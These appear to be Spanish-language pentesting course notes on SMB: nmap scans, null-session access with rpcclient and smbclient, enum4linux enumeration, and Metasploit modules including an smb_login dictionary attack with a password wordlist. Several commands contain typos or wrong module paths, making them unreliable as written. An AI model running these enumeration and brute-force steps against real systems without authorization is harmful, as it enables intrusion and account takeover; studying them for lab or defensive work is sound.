SMB (Server Message Block) es una implementacion de Windows de un recurso compartido de archivos.
CIFS es el sistema de archivos comun de Internet, funciona de la misma manera que un SMB
Los puertos que utiliza un servicio SMB, 445/TCP.
SMB: Nmap Scripts
Se utilizaran algunos scripts de nmap, para realmente encontrar alguna informacion fuera de este servicion. Dentro de nmap, se encuentra un motor de secuencias de comandos puede enocntrar algunos ejemplos en el sitio de nmap.
ping <IP>
nmap <IP>
El siguiente comando nos ayudara a identificar los protocolos que se estan ejecutando el el puerto de SMB 445
Estado del servidor (Cantidad de informacion enviada/recibida, inicios de sesion fallidos, perimosos con errores, trabajos de impresion o archos abiertos.
msfconsole
use /scanner/smb/smb_version
options
run
exploit
nmblookup -A <IP hacker>
<20>: Identifica quje nos podemos conectar a ese servidor
Iniciar sesion
smbclient -L <IP> -N
rpcclient -U "" -N <IP>
SMB: Samba 2
nmap <IP>
Escaneo del Servicio
nmap <IP> -p445 -sV
conexion al recurso con una sesion nula
rpcclient -U "" -N <IP>
Version del Sistema Operativo
srvinfo
exit
La herramiento enum4linux, es una herramienta poderosa pero en con el siguiente comando podemos obtener: Usuarios, ver si permite sesiones nulas, Sistema operativo, etc. Recopila mucha información
enum4linux -o <IP>
Tambien se utilizara la herramienta
smbclient -L <IP> -N
nmap <IP> -p445 --script smb-protocols
msfconsole
use /auxiliary/scanner/smb/smb2
options
run
exit
Ejecutar y/o ingresar al recurso compartido con una sesion nula.
smbclient //<IP>/Public -N
SMB Dictionary Attack
En los puntos anteriores se ha estado utilizando sesiones nulas en SMB, por lo cual son sesiones en las que no nos autenticamos.
Dentro de los ataques por diccionario, se utiliza una lista de palabras y contraseñas que la gente a utilizado, esto se conoce como contraseñas inseguras.
La herramienta que nos ayudara a realizar este proceso, es la rykiu
nmap <IP>
msfconsole
use auxiliary/scanner/smb/smb_login
info
options
set rhosts
#Configuracion de archivo oara que proporcione una lista de palabras.
set pass?file /usr/share/wordlists/metasploit/unix_passwords.tx
set smbuser <usuario>
#Verificar si existe algun parametro que se requiera que se llene
options
run
Este procedimiento también se puede realizar con la herramienta Hydra.
msfconsole
use auxiliary/scanner/smb/pipe_auditor
set smbuser <Usuario>
set smbpass <Contraseña>
set rhosts <Tarjet>
#Verificar si existe algun parametro que se requiera que se llene
options
run